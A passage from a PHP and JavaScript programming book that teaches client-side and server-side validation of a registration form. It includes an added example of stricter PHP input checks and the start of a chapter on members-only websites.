<link rel="stylesheet" type="text/css" href="form.css">

The JavaScript being loaded is jQuery from a Content Delivery Network 
(CDN) and your own JavaScript file. 

The next area of interest is setting up the form itself, with this code: 

<form id="userForm" method="POST" action="form-process.php"> 

That code creates a form that will use the HTTP POST method and call a PHP 
file named form-process.php. Directly below the form is an empty <div>
element. This is used to provide feedback for the user that an error has 
occurred: 


<div id="errorDiv"></div> 


Form elements are added next. The various form elements on this page all 
follow the same general pattern with a <label> followed by an <input> 
and then a <span> for error feedback. The <span> element is hidden 
through the CSS. More on that later. 

<label for="name">Name:* </label>
<input type="text" id="name" name="name">
<span class="errorFeedback errorSpan" id="nameError">Name is required</span>

<br /> 

The CSS for the form looks like this: 

form fieldset { 

display: inline-block; 

} 

.radioButton { 

float: none; 
display: inline; 
margin-right: 0.1em;
width: 2em; 

} 

form label { 

width: 8em; 
margin-right: 1em;
float: left; 
text-align: right; 
display: block; 

} 

form input { 

width: 15em; 

} 

#submit { 

margin-top: 2em; 
float: right; 

} 

That CSS sets up the look and feel of the form elements, including the width 
and alignment of the various elements. The next part of the CSS handles the 
error displays that provide visual and textual feedback to the user when 
something goes wrong. 

.errorClass { 

background-color: #CC6666; 

} 

#errorDiv { 

color: red; 

} 

.errorFeedback { 

visibility: hidden; 


} 

Adding JavaScript validation

Now it’s time to add JavaScript validation to the web form. Since you have 
a form, you need to connect to the form’s submit event. Since you’re using 
jQuery, doing so is really, really easy. The basic process is to check for 
errors, and if errors are found, to stop the “default” action from occurring. 

The “default” action for a form is to submit to a server (or whatever’s in the 
action attribute on the form). But if an error occurs, we might as well save 
that round-trip to the server and back and just keep the user right on the 
form to correct the mistakes. 

For this validation, set up a validation function and then call that function 
from within the submit event handler. Doing so means that you can keep all 
the validation logic within a single function, which makes maintenance and 
troubleshooting easier. 

Here’s an exercise to add a submit handler and a validation function. 

1. Open form.js within your editor.

The file should look like this: 

$(document).ready(function() { 

alert("hello"); 

}) ; 

2. Remove alert ("hello"); from the code. In its place, add the 
following code: 

$("#userForm").submit(function(e) { 

var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

e.preventDefault(); 
return false; 

} 

}) ; 

function validateForm() { 

var errorFields = new Array();
return errorFields; 

} 

The file now looks like this: 

$(document).ready(function() {

    $("#userForm").submit(function(e) {
        var errors = validateForm();
        if (errors == "") {
            return true;
        } else {
            e.preventDefault();
            return false;
        }
    });

    function validateForm() {
        var errorFields = new Array();
        return errorFields;
    } //end function validateForm

});

3. Save the file (with the same name, form.js) in your document root.

4. Reload the form.php page within your web browser.

There shouldn’t be any changes to the form, even on submit; you 
haven’t added any validation yet, just the foundation for it. 

Add rudimentary validation, to check that required fields have something 
in them. 

5. Within the validateForm() function, after the errorFields declaration,
add the following code:

//Check required fields have something in them 
if ($('#name').val() == "") { 
errorFields.push('name'); 

} 

if ($('#email').val() == "") { 
errorFields.push('email'); 

} 

if ($('#password1').val() == "") {
errorFields.push('password1');

} 

The code for that function should look like this: 

function validateForm() {
    var errorFields = new Array();

    //Check required fields have something in them
    if ($('#name').val() == "") {
        errorFields.push('name');
    }
    if ($('#email').val() == "") {
        errorFields.push('email');
    }
    if ($('#password1').val() == "") {
        errorFields.push('password1');
    }

    return errorFields;
} //end function validateForm

6. Save the file (as form.js) in your document root.

7. Reload the form.php page through your browser. 

8. Without filling in any form fields, click Submit Query.

Notice that the form doesn’t appear to do anything at all. This is 
expected. 

9. Fill in the Name, E-mail Address, and Password fields with something. 

Anything will do. 

10. With those fields filled in, click Submit Query. 

The form should submit and give a Page Not Found (or similar) error 
because the form’s action hasn’t been set up yet. 

11. Click Back to go back to the form. 

Now you have basic validation for required fields in place but no feedback 
for the user. Adding feedback is a matter of activating the CSS classes that 
you already set up in a prior exercise. 

Providing feedback to form users

The general pattern for the feedback on this form will be to highlight the 
field that needs attention and activate messaging for the individual field and 
the overall form. 

To facilitate providing feedback, create two new functions in form.js.

1. Open form.js in your editor, if it isn’t already open.

2. Within form.js, add the following functions, after the validateForm
function:

function provideFeedback(incomingErrors) {
    for (var i = 0; i < incomingErrors.length; i++) {
        $("#" + incomingErrors[i]).addClass("errorClass");
        $("#" + incomingErrors[i] + "Error").removeClass("errorFeedback");
    }
    $("#errorDiv").html("Errors encountered");
}

function removeFeedback() {
    $("#errorDiv").html("");
    $('input').each(function() {
        $(this).removeClass("errorClass");
    });
    $('.errorSpan').each(function() {
        $(this).addClass("errorFeedback");
    });
}

3. With those functions in the file, you next need to call them.

The call to the removeFeedback function is added right away within 
the submit handler so that error feedback is cleared when the form is 
submitted. That call looks like this: 

removeFeedback(); 

The provideFeedback function needs to be added within the else 
condition in the form’s submit handler and looks like this: 

provideFeedback(errors) ; 

The submit handler should now look like this: 

$("#userForm").submit(function(e) {

removeFeedback(); 
var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

provideFeedback(errors) ; 
e.preventDefault(); 
return false; 

} 

}) ; 

4. Save the file (as form.js) within your document root.

At this point, the entire file should consist of this: 

$(document).ready(function() {

    $("#userForm").submit(function(e) {
        removeFeedback();
        var errors = validateForm();
        if (errors == "") {
            return true;
        } else {
            provideFeedback(errors);
            e.preventDefault();
            return false;
        }
    });

    function validateForm() {
        var errorFields = new Array();

        //Check required fields have something in them
        if ($('#name').val() == "") {
            errorFields.push('name');
        }
        if ($('#email').val() == "") {
            errorFields.push('email');
        }
        if ($('#password1').val() == "") {
            errorFields.push('password1');
        }

        return errorFields;
    } //end function validateForm

    function provideFeedback(incomingErrors) {
        for (var i = 0; i < incomingErrors.length; i++) {
            $("#" + incomingErrors[i]).addClass("errorClass");
            $("#" + incomingErrors[i] + "Error").removeClass("errorFeedback");
        }
        $("#errorDiv").html("Errors encountered");
    }

    function removeFeedback() {
        $("#errorDiv").html("");
        $('input').each(function() {
            $(this).removeClass("errorClass");
        });
        $('.errorSpan').each(function() {
            $(this).addClass("errorFeedback");
        });
    }

});

5. Reload form.php in your browser. 

6. Clear any information from the fields, if any was saved by your
browser.

7. With empty fields in the form, click Submit Query.

You should receive errors like those shown in Figure 3-4. 


Figure 3-4: Errors provided through JavaScript.

8. Fill in the Name field and click Submit Query.

The feedback indicating there was an error in the Name field should 
clear, but the others will remain, as in Figure 3-5. 


Figure 3-5: Correcting one error in the form.



9. Fill in details within the E-mail Address and Password fields and click 
Submit Query. 

The form should submit, again giving a Page Not Found or similar error. 

Refining the validation

Now you’ve checked your required fields and provided feedback to the user. 
Next up, you need to refine the validation. Prior to doing so, you should 
pause and look at the code you’ve added for validation. 

The submit event handler is set up through jQuery’s submit() function:

$("#userForm").submit(function(e) {

removeFeedback() ; 
var errors = validateForm(); 
if (errors == "") { 
return true; 

} else { 

provideFeedback(errors); 
e.preventDefault(); 
return false; 

} 

}) ; 

Within the submit() function, the first thing that happens is any feedback
is removed. Next, the validateForm() function is called and anything that
comes back from that function is set into the errors variable. If the errors
variable is empty, then the submit() function returns Boolean true, which
essentially tells the browser, “Everything’s okay; go ahead and submit the
form.” However, if errors are encountered, the provideFeedback() function
is called and the default actions (to submit the form) are stopped, thanks to
the preventDefault and return false statements.

The validateForm() function is the heart of the validation logic for the form.

function validateForm() { 

var errorFields = new Array(); 

//Check required fields have something in them 
if ($('#name').val() == "") { 
errorFields.push('name'); 

} 

if ($('#email').val() == "") {
errorFields.push('email'); 

} 

if ($('#password1').val() == "") {
errorFields.push('password1');

} 

return errorFields; 

} //end function validateForm 

In this function, an array is instantiated to hold the error fields. This enables 
you to store more than one error instead of a single error at a time (which 
would be frustrating to the user). 

Each required field is retrieved using its ID. If the value of that field is "", 
then the ID of the field with the error is pushed onto the errorFields 
array. Finally, the errorFields array is returned and becomes the error 
array that you see in the submit() handler.

Another way to accomplish this task would be to add a class to each element
that’s required and then loop through each of the required classes with
jQuery, like $('.required').each().

With that validation, you can look at the provideFeedback() function:

function provideFeedback(incomingErrors) {
    for (var i = 0; i < incomingErrors.length; i++) {
        $("#" + incomingErrors[i]).addClass("errorClass");
        $("#" + incomingErrors[i] + "Error").removeClass("errorFeedback");
    }
    $("#errorDiv").html("Errors encountered");
}

The provideFeedback() function loops through the incoming errors and
adds the errorClass class to the fields. Recall from the CSS that this class 
simply sets the background color to a shade of red. Next, the errorFeedback 
class is removed. This class hides the textual feedback, so by removing the 
class, the feedback becomes visible to the user. Finally, outside of the loop, 
the errorDiv’s HTML is set to the phrase "Errors encountered". 

The final piece of the form.js file (so far) is the removeFeedback()
function:

function removeFeedback() {

$("#errorDiv").html(""); 

$('input').each(function() { 

$(this).removeClass("errorClass"); 

}) ; 

$('.errorSpan').each(function() { 

$(this).addClass("errorFeedback"); 

}) ; 

} 

This function first sets the errorDiv’s HTML to blank. Next, each input has 
its errorClass removed and each errorSpan on the page has its
errorFeedback class added, which essentially hides them from visibility. All of
this is done with the help of jQuery selectors and functions. 

Adding more validation

Looking at the validation you’ve done so far, a couple things are evident: 
First, the E-mail Address field can be filled in with an invalid e-mail address 
in it. Second, there’s nothing verifying that the passwords match. You next 
tackle both of those and one more for the phone number too. Luckily, you 
already have the underlying structure in place for validation, so refinements 
become much easier. 

Continue with more validation by adding a check to make sure the passwords 
match and that the e-mail address contains a period and an @ symbol. 

1. Within the form.js file, add the following code in the validateForm()
function, prior to the return errorFields statement:

// Check passwords match
if ($('#password2').val() != $('#password1').val()) {
    errorFields.push('password2');
}

//very basic e-mail check: needs a period and an @ symbol.
//indexOf() returns -1 when the character is missing, so compare
//the result instead of testing it as true or false
if (!($('#email').val().indexOf(".") > 2) ||
    !($('#email').val().indexOf("@") > 0)) {
    errorFields.push('email');
}

2. Save the file (as form.js) in your document root.

3. Load http://localhost/form.php in your browser or reload the
page if it’s already open. 

4. Enter something other than an e-mail address into the E-mail Address 
field. 

Specifically, don’t enter an @ symbol in your input. 

5. Click Submit Query. 

You should see a page like the one in Figure 3-6. 


Figure 3-6: Testing e-mail validation.




Note that the error feedback indicates that e-mail is required. A further 
refinement would be to indicate that the address is invalid. 

6. Enter a valid e-mail address into the field and enter a password into
the first Password field.


7. Click Submit Query. 


You now see an error indicating that the passwords don’t match, as 
depicted in Figure 3-7. 

Figure 3-7: Testing password match validation.


Breaking this code down, you see there were two validations added: one for 
password match and one for e-mail address validation. Here’s the password 
matching validation: 

if ($('#password2').val() != $('#password1').val()) {

errorFields.push('password2'); 

} 

This code simply checks the value of both fields and if they don’t match, 
sets up an error connected to the password2 field of the form. 

The e-mail validation looks like this: 

//very basic e-mail check: needs a period and an @ symbol.
//indexOf() returns -1 when the character is missing, so compare
//the result instead of testing it as true or false
if (!($('#email').val().indexOf(".") > 2) ||
    !($('#email').val().indexOf("@") > 0)) {
    errorFields.push('email');
}

This validation looks for a single dot in the address and also looks for an @
symbol. Granted, this is very basic validation, but e-mail addresses are
notoriously complex things to check, given the number of valid variations and
characters allowed in an address.

One final area to validate: the phone number. Although it isn’t a required 
field, when it is filled in, it would be nice to make sure that it contains at 
least a certain number of digits. Also, if the phone number is filled in, then 
the Number Type field suddenly becomes required. 

Adding these checks won’t be quite as simple as the others, especially since 
the Number Type field is a radio button. Nevertheless, it isn’t too difficult to 
do so. Follow these steps. 

1. Within form.js, add the following code in the validateForm() function
prior to the return errorFields statement:

if ($('#phone').val() != "") {
    var phoneNum = $('#phone').val();
    //strip everything except digits; replace() returns the new string
    phoneNum = phoneNum.replace(/[^0-9]/g, "");
    if (phoneNum.length != 10) {
        errorFields.push("phone");
    }
    if (!$('input[name=phonetype]:checked').val()) {
        errorFields.push("phonetype");
    }
}

2. Save the file (as form.js).

3. Load the form.php page or reload if your browser is already open.

4. Fill in the required fields correctly and a valid ten-digit phone number 
into the Phone Number field, but don’t select either of the Number 
Type options. Click Submit Query. 

You should receive a page like the one in Figure 3-8. 


Figure 3-8: Testing Number Type validation.

You can see from Figure 3-8 that the visual feedback isn’t very evident or
easy to spot. To correct that, you need to add some CSS. 

5. Open form.css in your editor.

6. Within form.css, add the following CSS at the bottom of the file.

.phoneTypeError {
    margin-left: 1.2em;
    padding: 0.1em;
    background-color: #CC6666;
}

7. Reload form.php in your browser. 

8. Fill in the required fields correctly and then type a valid ten-digit
phone number into the Phone Number field, but don’t select either of 
the Number Type options. Click Submit Query. 

You should now receive a page like the one in Figure 3-9. 


Figure 3-9: The Number Type validation feedback is now more visible.

You now have some JavaScript validation complete, but your job isn’t nearly
done. What you’ve done so far is helped the user receive fast feedback for
filling out the form. The main and most important area for true form validation
is within the server-side code, the PHP.


Performing PHP Validation

This section examines server-side validation with PHP. You use the HTML,
CSS, and JavaScript from earlier in the chapter for the exercises in this section.
The overall goal is to make sure that any input received from the user,
whether from a web form, a web service, or elsewhere, is checked and
sanitized.

So far you’ve been using an HTML page called form.php that set up a web
form. The action of that web form refers to a page called form-process.php.
In this section, you build form-process.php and a success page, too.

In order to pass errors back to the form, you need to use sessions. Additionally, 
you need to carve out a space to provide the error feedback from PHP within 
that form page. This means making some slight changes to the form.php 
file that you’ve been using. That seems like a logical place to start with an 
exercise. 

1. Open form.php in your editor.

2. Within form.php, add the following code to the top, above the
<doctype> declaration:

<?php session_start(); ?>

3. Change the <div id="errorDiv"></div> line to look like this code:

<div id="errorDiv">
<?php
if (isset($_SESSION['error']) && isset($_SESSION['formAttempt'])) {
    unset($_SESSION['formAttempt']);
    print "Errors encountered<br />\n";
    foreach ($_SESSION['error'] as $error) {
        print $error . "<br />\n";
    } //end foreach
} //end if
?>
</div>

4. In order to test the PHP validation, you need to skip the JavaScript
validation. Therefore, comment out the JavaScript validation file,
form.js, so that it doesn’t load.

The line should look like this when you’re done:

<!-- <script type="text/javascript" src="form.js"></script> -->

5. Save form.php.

6. Load the page in your browser at http://localhost/form.php.

There should be no change from previous times when you loaded the page.
However, now you don’t have to fill anything in at all and the form will
submit without error because the JavaScript validation has been temporarily
removed.

The PHP you added to form.php starts the session and then looks to see if
the session variables named error and formAttempt are set. If those are
set, then you know that there are errors and that the errors are the result of
a form attempt. The formAttempt session variable is then unset. This helps
for situations where users use the Back button in their browser. The
formAttempt session variable will again be set next time they submit the form
(as you see later).

If errors are encountered, output is created to that effect and each error
message is printed to the screen. (You test it shortly.)

One other prerequisite item is to set up a success page. Follow these steps:

1. Create a new empty text file in your editor.

2. Place the following HTML in that file:

<!doctype html>
<html>
<head>
<title>A form - Success</title>
</head>
<body>
<div>
Thank you for registering
</div>
</body>
</html>

3. Save the file as success.php in your document root.

Validating required fields

With the prep work complete, you can now begin building the form-process 
page. You build this file in stages, starting with the basic framework and 
then adding more complex validation and features as you go. 

1. Open your text editor and create a new file.

2. In that file, place the following code:

<?php
//prevent access if they haven't submitted the form.
if (!isset($_POST['submit'])) {
    die(header("Location: form.php"));
}

session_start();
$_SESSION['formAttempt'] = true;

if (isset($_SESSION['error'])) {
    unset($_SESSION['error']);
}

$required = array("name","email","password1","password2");

$_SESSION['error'] = array();

//Check required fields
foreach ($required as $requiredField) {
    if (!isset($_POST[$requiredField]) || $_POST[$requiredField] == "") {
        $_SESSION['error'][] = $requiredField . " is required.";
    }
}

//final disposition
if (isset($_SESSION['error']) && count($_SESSION['error']) > 0) {
    die(header("Location: form.php"));
} else {
    unset($_SESSION['formAttempt']);
    die(header("Location: success.php"));
}
?>

3. Save the file as form-process.php in your document root.

4. Load the main form.php file at http://localhost/form.php in
your web browser.

5. Click Submit Query without filling anything out in the form.

You should receive a page like that in Figure 3-10. 


Figure 3-10: Verifying PHP validation.

If you receive a page like those in any of the previous figures, with the text
fields colored red, then the JavaScript validation is still firing. Make sure 
you’ve commented out the JavaScript from form.php, and make sure the 
page has been reloaded recently in your browser. 


Before continuing, look at this code since it serves as the basis for your PHP 
validation. 

The first thing done in the file is to make sure it’s being hit from the form’s
Submit button:

//prevent access if they haven't submitted the form.
if (!isset($_POST['submit'])) {
    die(header("Location: form.php"));
}

If that isn’t the case, then the browser is redirected back to form.php.

Next up, the session is started and the formAttempt variable is set to true.
Recall that this variable is used within the form.php page to indicate that
the user has come from this process page versus reloading or using his or
her Back button.

Next, all the existing errors are unset. There is no need for them in the 
process page, and you need to recheck everything again. The error array is 
initialized again. 

if (isset($_SESSION['error'])) {
    unset($_SESSION['error']);
}

$_SESSION['error'] = array();

Next, an array is set up with the required fields. This makes adding required 
fields later an easy task. Just add them to this array: 

$required = array("name","email","password1","password2");

The heart of the basic required field validation is next, inside a foreach
loop:

//Check required fields
foreach ($required as $requiredField) {
    if (!isset($_POST[$requiredField]) || $_POST[$requiredField] == "") {
        $_SESSION['error'][] = $requiredField . " is required.";
    }
}

If the field isn’t set or is empty, then an error element is added to the
$_SESSION['error'] array.

Finally, if the $_SESSION['error'] array has any elements, you need to
redirect back to the form page; otherwise, send them to the success page.

//final disposition
if (count($_SESSION['error']) > 0) {
    die(header("Location: form.php"));
} else {
    unset($_SESSION['formAttempt']);
    die(header("Location: success.php"));
}

Validating text

You’ve now checked to make sure that something is filled in for the required
fields, but you haven’t checked to see what they contain. For all you know,
they could contain a single space.

Validating text typically means using a regular expression. This condition can
be added to form-process.php directly above the //final disposition
section:

if (!preg_match('/^[\w .]+$/',$_POST['name'])) {
    $_SESSION['error'][] = "Name must be letters and numbers only.";
}

This code sets up a regular expression to look for anything that isn’t a letter
or number (the \w part), a space, or a period. Obviously, if you have a form
that allows other characters, they can be added to the character class. If you
add that code to form-process.php and attempt to fill in something with
other characters into the Name field, you’ll receive the error.

Validating drop-downs, radio buttons, and check boxes

Validating data from drop-downs (or select/option elements), radio buttons,
or check boxes should be done in the PHP. Even though it may appear that
the users have to pick from one of the options, they may (maliciously or
otherwise) not have that filled out correctly. It’s your job to make sure it’s valid.

The following code sets up an array of the valid states (from the drop-down
in form.php) and then looks to see if what’s being received is found in that
valid array. This code can be added just above the final disposition section.

$validStates = array("Alabama","California","Colorado","Florida",
    "Illinois","New Jersey","New York","Wisconsin");

if (isset($_POST['state']) && $_POST['state'] != "") {
    if (!in_array($_POST['state'],$validStates)) {
        $_SESSION['error'][] = "Please choose a valid state";
    }
}

One item of note here is that you not only need to check to see if the state
is set, but also need to see that it isn’t blank. You need to do this because
the default value on the form is blank for this drop-down and the field isn’t
required, so blank is a valid value. If it’s set and not blank, though, then it
needs to be set to a valid value.

The set of phone number type radio buttons is the same concept. Set up an 
array of valid values and check to make sure the value passed in is one of 
those valid values. Since this field isn’t required unless the phone number is 
filled in, save its check for later. 

Validating numbers

Validating numbers can involve a regular expression, if you’re expecting a
certain format or number of digits, or can involve math if you’re looking for
certain values (or could be both too).

ZIP code validation presents an easier case, so you tackle that first. You
need to validate that only digits were entered into the ZIP field and that
there are at least five and no more than nine digits in the field. You could do
this with a single regular expression, but doing so would prevent you from
returning a specific error message: You wouldn’t know if users filled in letters
or if they only had four digits in the ZIP field. Therefore, the method you use in
the next exercise separates those two tests into their own conditional.

This code can be added above the final disposition section:

if (isset($_POST['zip']) && $_POST['zip'] != "") {
    if (!preg_match('/^[\d]+$/',$_POST['zip'])) {
        $_SESSION['error'][] = "ZIP should be digits only.";
    } else if (strlen($_POST['zip']) < 5 || strlen($_POST['zip']) > 9) {
        $_SESSION['error'][] = "ZIP should be between 5 and 9 digits";
    }
}

The code first checks to see if the ZIP is set. If it is set and isn’t empty, then
the next check is to see if it contains only digits. If it contains something
other than digits, then there’s no need to run the next test. If digits are all
that’s found, then the next check can be run, to make sure the length is
between 5 and 9 digits.

Validating the phone number uses the same logic. If the phone field is set and 
not blank, then check to make sure it contains only digits. Next, the length is 
checked to make sure it’s at least ten digits. You could also add a maximum 
length check here, but this one will account for international numbers, too. 

The phonetype field is checked next. If it isn’t set (and you know that it’s
required because you’re inside of a conditional test checking whether the
phone number was set), then you return an error. Assuming that it’s indeed
set, check the value to make sure it’s one of the acceptable values for the
field, similar to that done in the previous section for the state drop-down.

This code can be added above the final disposition section in
form-process.php.

if (isset($_POST['phone']) && $_POST['phone'] != "") {
    if (!preg_match('/^[\d]+$/',$_POST['phone'])) {
        $_SESSION['error'][] = "Phone number should be digits only";
    } else if (strlen($_POST['phone']) < 10) {
        $_SESSION['error'][] = "Phone number must be at least 10 digits";
    }
    if (!isset($_POST['phonetype']) || $_POST['phonetype'] == "") {
        $_SESSION['error'][] = "Please choose a phone number type";
    } else {
        $validPhoneTypes = array("work","home");
        if (!in_array($_POST['phonetype'],$validPhoneTypes)) {
            $_SESSION['error'][] = "Please choose a valid phone number type.";
        }
    }
}

Validating URLs and e-mail addresses

Truly validating an e-mail address is a surprisingly difficult task. The
standard for e-mail addresses allows for complex combinations of letters,
numbers, and special characters, some of which can only appear in certain
positions. PHP versions 5.2 and greater include a filter_var() function
that takes this complexity away and makes it easier to filter things like e-mail
addresses and URLs (among other things).

This section examines validation of e-mail addresses and URLs.

Validating an e-mail address

The filter_var() function includes a number of built-in tests to check to
see if an e-mail address is valid. Table 3-1 shows some of the built-in filters
for validation.

Table 3-1: Select Validation Filters in PHP

Filter                     Description
FILTER_VALIDATE_BOOLEAN    Validates that a value is a Boolean.
FILTER_VALIDATE_INT        Validates that a number is an integer.
FILTER_VALIDATE_FLOAT      Validates that a number is a floating point number.
FILTER_VALIDATE_IP         Validates an IP address.
FILTER_VALIDATE_EMAIL      Validates an e-mail address.
FILTER_VALIDATE_URL        Validates a URL.

Using the filters is very easy. For example, here’s the code to validate an
e-mail address. This code could be plugged into the form-process.php file
above the final disposition section:

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) {
    $_SESSION['error'][] = "Invalid e-mail address";
}

That code is all you need to validate an e-mail address in PHP. 

Validating a URL 

Though not included in the form used in this chapter, URLs can be validated 
in the same way. Say you have a variable called $url. The validation code 
looks the same; it just uses a different filter. 

if (!filter_var($url,FILTER_VALIDATE_URL)) {
    $_SESSION['error'][] = "Invalid URL";
}

Making sure the passwords match 

Users who fill out this form need to enter their password twice. It’s then up 
to you to make sure that the passwords that a user entered are the same. 
Though this check occurs in the JavaScript, it also needs to occur in the 
PHP. 

Your form processing page has already checked to make sure there are 
values in both of the password fields on the form, so checking that they 
match is as simple as this: 

if ($_POST['password1'] != $_POST['password2']) {
    $_SESSION['error'][] = "Passwords don't match";
}

With that check, the form processing has been completed. Users can fill out
the form and if, for some reason, the JavaScript didn’t catch an error, the 
error would be caught in the PHP. 

Listing 3-1 shows the final form process page built in this chapter. 


Listing 3-1: The Final Form Processing Page

<?php
//prevent access if they haven't submitted the form.
if (!isset($_POST['submit'])) {
    die(header("Location: form.php"));
}

session_start();
$_SESSION['formAttempt'] = true;

if (isset($_SESSION['error'])) {
    unset($_SESSION['error']);
}

$_SESSION['error'] = array();

$required = array("name","email","password1","password2");

//Check required fields
foreach ($required as $requiredField) {
    if (!isset($_POST[$requiredField]) || $_POST[$requiredField] == "") {
        $_SESSION['error'][] = $requiredField . " is required.";
    }
}

if (!preg_match('/^[\w .]+$/',$_POST['name'])) {
    $_SESSION['error'][] = "Name must be letters and numbers only.";
}

$validStates = array("Alabama","California","Colorado","Florida",
    "Illinois","New Jersey","New York","Wisconsin");

if (isset($_POST['state']) && $_POST['state'] != "") {
    if (!in_array($_POST['state'],$validStates)) {
        $_SESSION['error'][] = "Please choose a valid state";
    }
}

if (isset($_POST['zip']) && $_POST['zip'] != "") {
    if (!preg_match('/^[\d]+$/',$_POST['zip'])) {
        $_SESSION['error'][] = "ZIP should be digits only.";
    } else if (strlen($_POST['zip']) < 5 || strlen($_POST['zip']) > 9) {
        $_SESSION['error'][] = "ZIP should be between 5 and 9 digits";
    }
}

if (isset($_POST['phone']) && $_POST['phone'] != "") {
    if (!preg_match('/^[\d]+$/',$_POST['phone'])) {
        $_SESSION['error'][] = "Phone number should be digits only";
    } else if (strlen($_POST['phone']) < 10) {
        $_SESSION['error'][] = "Phone number must be at least 10 digits";
    }
    if (!isset($_POST['phonetype']) || $_POST['phonetype'] == "") {
        $_SESSION['error'][] = "Please choose a phone number type";
    } else {
        $validPhoneTypes = array("work","home");
        if (!in_array($_POST['phonetype'],$validPhoneTypes)) {
            $_SESSION['error'][] = "Please choose a valid phone number type.";
        }
    }
}

if (!filter_var($_POST['email'],FILTER_VALIDATE_EMAIL)) {
    $_SESSION['error'][] = "Invalid e-mail address";
}

if ($_POST['password1'] != $_POST['password2']) {
    $_SESSION['error'][] = "Passwords don't match";
}

//final disposition
if (count($_SESSION['error']) > 0) {
    die(header("Location: form.php"));
} else {
    unset($_SESSION['formAttempt']);
    die(header("Location: success.php"));
}
?>

Creating a validation function

The filter_var function goes a long way towards providing automated
validation for common form elements. If you start working with forms, you’ll 
find that you need to validate the same things over and over again, like ZIP 
code or state, too. Unfortunately, there aren’t any built-in PHP functions to 
validate a ZIP code or state. But there’s nothing preventing you from creating 
one! 

For example, Listing 3-2 shows a function to validate a state. 


Listing 3-2: Creating a State Validation Function 

function is_valid_state($state) {
    $validStates = array("Alabama","California","Colorado","Florida",
        "Illinois","New Jersey","New York","Wisconsin");
    if (in_array($state,$validStates)) {
        return true;
    } else {
        return false;
    }
} //end function is_valid_state

This function accepts an argument of the state to check. The state is checked
against the list of known states. If the state is found among that list, the 
function returns Boolean true, meaning that it’s a valid state. 

Listing 3-3 shows a function to validate the ZIP. 


Listing 3-3: Creating a ZIP Validation Function 

function is_valid_zip($zip) {
    //digits only, and either five or nine of them
    if (preg_match('/^[\d]+$/',$zip) && (strlen($zip) == 5 || strlen($zip) == 9)) {
        return true;
    } else {
        return false;
    }
} //end function is_valid_zip

Like the state function, the function in Listing 3-3 also accepts an incoming
argument, this time the ZIP code to validate. The same basic validation checks
are performed in this function as they were in the non-functionalized version
from the form-process.php file. If the ZIP is just digits and is either five or
nine digits, then Boolean true is returned; otherwise, false is returned.

In most cases, you’d create these functions in an external file and then
require that file wherever needed through require_once() or through
your autoload process. For example, say you included those validation functions
in a file called validation.inc and then used the following line at the top
of the form-process.php file.

require_once("validation.inc");

Changing the form-process.php file to use these functions looks like this:

if (isset($_POST['state']) && $_POST['state'] != "") {
    if (!is_valid_state($_POST['state'])) {
        $_SESSION['error'][] = "Please choose a valid state";
    }
}

if (isset($_POST['zip']) && $_POST['zip'] != "") {
    if (!is_valid_zip($_POST['zip'])) {
        $_SESSION['error'][] = "ZIP code error.";
    }
}

Variations of these functions and concepts are used in the next chapter — 
and indeed throughout your career as a PHP programmer! 
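
The checks in this chapter assume every field arrives as a plain single-line string. The following added example (not from the book) shows stricter versions of the ZIP, phone, radio-button and password-match checks that also reject array-valued fields, a trailing newline, and numeric-looking strings that compare equal under !=. The strict_* function names and the sample inputs are constructed for illustration, and the ZIP rule follows Listing 3-3 (five or nine digits).

```php
<?php
// Added example, not from the book. The strict_* names are hypothetical;
// the field names and allowed values are the chapter's.

// Return the field only when it is present and really a string. A body such
// as zip[]=12345 makes $_POST['zip'] an array, which preg_match() and
// strlen() reject with a warning (PHP 7) or a TypeError (PHP 8).
function strict_field(array $post, $key) {
    return (isset($post[$key]) && is_string($post[$key])) ? $post[$key] : null;
}

// \A and \z anchor to the true start and end of the string. With ^ and $ the
// value "12345\n" is accepted, because $ also matches before a final newline.
function strict_zip($zip) {
    return is_string($zip) && preg_match('/\A\d{5}(?:\d{4})?\z/', $zip) === 1;
}

function strict_phone($phone) {
    return is_string($phone) && preg_match('/\A\d{10,}\z/', $phone) === 1;
}

// The third argument makes in_array() compare with === instead of ==.
function strict_choice($value, array $allowed) {
    return is_string($value) && in_array($value, $allowed, true);
}

// === compares the strings byte for byte. With == or != two numeric-looking
// strings such as "0e1234" and "0e5678" are compared as numbers and "match".
function strict_passwords_match($a, $b) {
    return is_string($a) && is_string($b) && $a !== '' && $a === $b;
}

// Run the ZIP, phone and password checks and return the list of errors.
function strict_validate(array $post) {
    $errors = array();
    if (isset($post['zip']) && $post['zip'] !== ''
            && !strict_zip(strict_field($post, 'zip'))) {
        $errors[] = "ZIP code error.";
    }
    if (isset($post['phone']) && $post['phone'] !== '') {
        if (!strict_phone(strict_field($post, 'phone'))) {
            $errors[] = "Phone number must be at least 10 digits";
        }
        if (!strict_choice(strict_field($post, 'phonetype'), array("work", "home"))) {
            $errors[] = "Please choose a valid phone number type.";
        }
    }
    if (!strict_passwords_match(strict_field($post, 'password1'),
                                strict_field($post, 'password2'))) {
        $errors[] = "Passwords don't match";
    }
    return $errors;
}

// Constructed inputs standing in for $_POST.
$samples = array(
    'well-formed'      => array('zip' => '54481', 'phone' => '7155551212',
                                'phonetype' => 'home',
                                'password1' => 'correct horse',
                                'password2' => 'correct horse'),
    'trailing newline' => array('zip' => "54481\n",
                                'password1' => 'a', 'password2' => 'a'),
    'array field'      => array('zip' => array('54481'),
                                'password1' => 'a', 'password2' => 'a'),
    'numeric strings'  => array('password1' => '0e1234', 'password2' => '0e5678'),
);

foreach ($samples as $label => $post) {
    $errors = strict_validate($post);
    print $label . ": " . (count($errors) ? implode("; ", $errors) : "ok") . "\n";
}

// The looser forms on the same constructed values, for comparison.
print "^...$ regex accepts the newline value: ";
var_dump(preg_match('/^[\d]+$/', "54481\n") === 1);
print "!= reports a mismatch for the numeric strings: ";
var_dump('0e1234' != '0e5678');
```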


Chapter 4: Building a Members-Only Website


In This Chapter 

Understanding the concepts involved in authentication and authorization 

Adding a user database 

Building login page functionality 

Authenticating users 

Using PHP’s mail function 


Many websites are secret — restricted to only authorized users — or
have secret sections. Such websites require users to log in before
they can see the secret information. Here are some examples of situations in 
which websites might restrict access: 


♦ E-commerce administration: Many online merchants require customers 
to log in so that their information can be stored for future transactions. 
The customer information, particularly financial information, needs to 
be protected from public view. 

♦ Confidentiality: Many websites need to restrict information to certain 
people. For instance, company information might be restricted to 
company staff or members of a certain department. 

♦ Paid access: Some websites provide access to information that’s available 
for sale, so the information needs to be restricted to people who have 
paid for it. 


User login is one of the most common applications on the web, with many 
uses. We’re sure you’ve seen and logged in to many login applications. 


